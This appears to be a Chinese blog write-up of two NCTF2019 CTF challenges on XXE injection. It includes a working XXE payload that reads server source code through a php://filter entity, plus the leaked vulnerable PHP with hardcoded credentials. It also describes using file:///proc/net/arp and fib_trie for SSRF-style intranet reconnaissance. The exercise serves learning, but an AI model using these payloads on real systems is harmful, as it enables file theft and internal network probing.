【XXE实战】——浅看两道CTF题

  • 上一条帖子【XXE漏洞】原理及实践演示对XXE的一些原理进行了浅析,于是写了两道CTF题巩固一下,顺便也记录一下第一次写出来CTF。两道题都是在BUU上找的:[NCTF2019]Fake XML cookbook和[NCTF2019]True XML cookbook

一、[NCTF2019]Fake XML cookbook

  • 打开是个登录界面:

  • F12看一下源码,可以发现存在一段js代码:

     

function doLogin(){
    
	var username = $("#username").val();
    
	var password = $("#password").val();
    
	if(username == "" || password == ""){
    
		alert("Please enter the username and password!");
    
		return;
    
	}

	var data = "<user><username>" + username + "</username><password>" + password + "</password></user>";
    
    $.ajax({
    
        type: "POST",
    
        url: "doLogin.php",
    
        contentType: "application/xml;charset=utf-8",
    
        data: data,
    
        dataType: "xml",
    
        anysc: false,
    
        success: function (result) {
    
        	var code = result.getElementsByTagName("code")[0].childNodes[0].nodeValue;
    
        	var msg = result.getElementsByTagName("msg")[0].childNodes[0].nodeValue;
    
        	if(code == "0"){
    
        		$(".msg").text(msg + " login fail!");
    
        	}else if(code == "1"){
    
        		$(".msg").text(msg + " login success!");
    
        	}else{
    
        		$(".msg").text("error:" + msg);
    
        	}
    
        },
    
        error: function (XMLHttpRequest,textStatus,errorThrown) {
    
            $(".msg").text(errorThrown + ':' + textStatus);
    
        }
    
    });
    
}

    可以看到存在一个doLogin.php文件。那么可以使用PHP://伪协议进行读取看看。

  • 抓包修改参数,输入我们的payload:

    <?xml version="1.0" encoding="UTF-8"?>
    
<!DOCTYPE foo[
    
<!ENTITY rabbit SYSTEM "PHP://filter/read=convert.base64-encode/resource=doLogin.php">
    
]>
    
<user><username>&rabbit;</username><password>1213</password></user>

    把得到的编码进行解码可以得到下面的php代码:

    <?php
    
/**
    
* autor: c0ny1
    
* date: 2018-2-7
    
*/

$USERNAME = 'admin'; //账号
    
$PASSWORD = '024b87931a03f738fff6693ce0a78c88'; //密码
    
$result = null;

libxml_disable_entity_loader(false);
    
$xmlfile = file_get_contents('php://input');

try{
    
	$dom = new DOMDocument();
    
	$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    
	$creds = simplexml_import_dom($dom);

	$username = $creds->username;
    
	$password = $creds->password;

	if($username == $USERNAME && $password == $PASSWORD){
    
		$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",1,$username);
    
	}else{
    
		$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",0,$username);
    
	}
    
}catch(Exception $e){
    
	$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",3,$e->getMessage());
    
}

header('Content-Type: text/html; charset=utf-8');
    
echo $result;
    
?>

    代码只是进行了一个简单验证,那么输入账号admin和密码024b87931a03f738fff6693ce0a78c88看看:

    没啥用...

  • 直接试试有没有flag目录(看有的题解说是题目有提示,所以不知道是不是buu的问题,我是没看到):

    over

二、[NCTF2019]True XML cookbook

  • 打开界面可以看到和上面题一模一样,然后同样读doLogin.php也没啥用,直接访问flag目录也没有线索。

  • 看题解后发现,可以使用XXE+SSRF的方法,即使用伪协议进行内网的嗅探。那么第一步就是看内网的结构:

    payload查看靶机路由表:

    file:///proc/net/arp

    可以看到有两个路由169.254.1.1和10.128.253.12。

  • 使用bp的intrude模块对这两个路径C段进行爆破

    爆破过程巨慢无比....不知道为啥,以后有空研究一下。但是看网上的wp说这两个C段扫描不出来东西。

  • 查看proc/net/fib_trie下的路由树

    file:///proc/net/fib_trie

  • 下面对10.244.80.215的C段进行爆破,同样非常慢,不想等了最后没解出来。

三、收获

  • 熟悉了使用file伪协议查看文件,php伪协议读取文件
  • 学习了xxe+ssrf的利用方式,对于linux主机可以读取proc/net/arp路径查看其路由表从而得到其内网结构。在主机没有flag的情况下,可能藏在其他内网主机中。
  • bp的intrude模块不知道怎么调才能实现超时放弃请求....

【XXE实战】——浅看两道CTF题的更多相关文章

  1. 『ACM C++』Virtual Judge | 两道基础题 - The Architect Omar && Malek and Summer Semester

    这几天一直在宿舍跑PY模型,学校的ACM寒假集训我也没去成,来学校的时候已经18号了,突然加进去也就上一天然后排位赛了,没学什么就去打怕是要被虐成渣,今天开学前一天,看到最后有一场大的排位赛,就上去试 ...

  2. 两道CTF Web的题目

    1.easyphp 1.1.题目描述 题目首先是一张不存在的图片 查看源码发现只有一句话 <img src="show.php?img=aGludC5qcGc=" width ...

  3. union注入的几道ctf题,实验吧简单的sql注入1,2,这个看起来有点简单和bugku的成绩单

    这几天在做CTF当中遇到了几次sql注入都是union,写篇博客记录学习一下. 首先推荐一篇文章“https://blog.csdn.net/Litbai_zhang/article/details/ ...

  4. Java基础知识强化11:多态的两道基础题

    1.第1题 class Base { public void method() { System.out.print("Base method"); } } class Child ...

  5. 逛园子,看到个练习题,小试了一把(淘宝ued的两道小题)

    闲来无事,逛园子,充充电.发现了一个挺有意思的博文,自己玩了一把. 第一题:使用 HTML+CSS 实现如图布局,border-widht 1px,一个格子大小是 60*60,hover时候边框变为橘 ...

  6. Co-prime Array&&Seating On Bus(两道水题)

     Co-prime Array Time Limit:1000MS     Memory Limit:262144KB     64bit IO Format:%I64d & %I64u Su ...

  7. MT【327】两道不等式题

    当$x,y\ge0,x+y=2$时求下面式子的最小值:1)$x+\sqrt{x^2-2x+y^2+1}$2)$\dfrac{1}{5}x+\sqrt{x^2-2x+y^2+1}$ 解:1)$P(x,y ...

  8. MT【235】两道函数题

    已知$g(x)=x^2-ax+4a$,记$h(x)=|\dfrac{x}{g(x)}|$,若$h(x)$在$(0,1]$上单调递增,求$a$的取值范围. 解答: 已知$$g(x)=\begin{cas ...

  9. [转载]2014年10月26完美世界校招两道java题

    public class VolitileTest { volatile static int count=0; public static void main(String args[]){ for ...

  10. DASCTF七月赛两道Web题复现

    Ezfileinclude(目录穿越) 拿到http://183.129.189.60:10012/image.php?t=1596121010&f=Z3F5LmpwZw== t是时间,可以利 ...

随机推荐

  1. C++面试八股文:技术勘误

    不知不觉,<C++面试八股文>已经更新30篇了,这是我第一次写技术博客,由于个人能力有限,出现了不少纰漏,在此向各位读者小伙伴们致歉. 为了不误导更多的小伙伴,以后会不定期的出勘误文章,请 ...

  2. SpringBoot定义优雅全局统一Restful API 响应框架完结撒花篇封装starter组件

    之前我们已经,出了一些列文章. 讲解如何封统一全局响应Restful API. 感兴趣的可以看我前面几篇文章 (整个starter项目发展史) SpringBoot定义优雅全局统一Restful AP ...

  3. Java 新的选择,Solon v2.3.7 发布

    Solon 是什么开源项目? 一个,Java 新的生态型应用开发框架.它从零开始构建,有自己的标准规范与开放生态(历时五年,已有全球第二级别的生态规模).与其他框架相比,它解决了两个重要的痛点:启动慢 ...

  4. Unity中的InitializeOnLoad特性:深入解析与实践

    Unity中的InitializeOnLoad特性:深入解析与实践 在Unity开发过程中,我们经常需要在编辑器启动时或脚本重新编译后执行一些操作,例如初始化数据.注册事件等.这时,我们可以使用Ini ...

  5. 基于python+django的宠物商店-宠物管理系统设计与实现

    该系统是基于python+django开发的宠物商店-宠物管理系统.是给师妹开发的课程作业.现将源码开放给大家.大家学习过程中,如遇问题可以在github咨询作者. 演示地址 前台地址: http:/ ...

  6. base64详解

    base64详解 前置知识 位与字节 二进制系统中,每个0或1就是一个位(bit,比特),也叫存储单元,位是数据存储的最小单位. 其中8bit就称为一个字节(Byte). 1B=8位 位运算 与运算: ...

  7. 阿里如何实现秒级百万TPS?搜索离线大数据平台架构解读

    ★ 淘宝搜索阶段 在2008-2012这个阶段,我们重点支持淘宝搜索的业务发展,随着淘宝商品量的不断增加,逐步引入Hadoop.Hbase等开源大数据计算和存储框架,实现了搜索离线系统的分布式化,有力 ...

  8. 最全面的JAVA多线程知识总结

    ​ 背景: 2023年经营惨淡,经历了裁员就业跳槽再就业,在找工作过程中对于知识的梳理和总结,本文总结JAVA多线程. 应用场景: 需要同时执行多个任务或处理大量并发请求时, 目前常用的场景有: We ...

  9. 【go语言】2.3.2 error 接口

    在 Go 语言中,error 是一个内置的接口类型,用于表示错误情况.error 接口的定义如下: type error interface { Error() string } 任何具有 Error ...

  10. Angular:修改启动端口号

    目标 修改预先设定的4200端口号,改为4100 解决方案 在启动命令中添加 --port 4100.参数 --open,会在启动时自动打开浏览器. ng serve --open --port 41 ...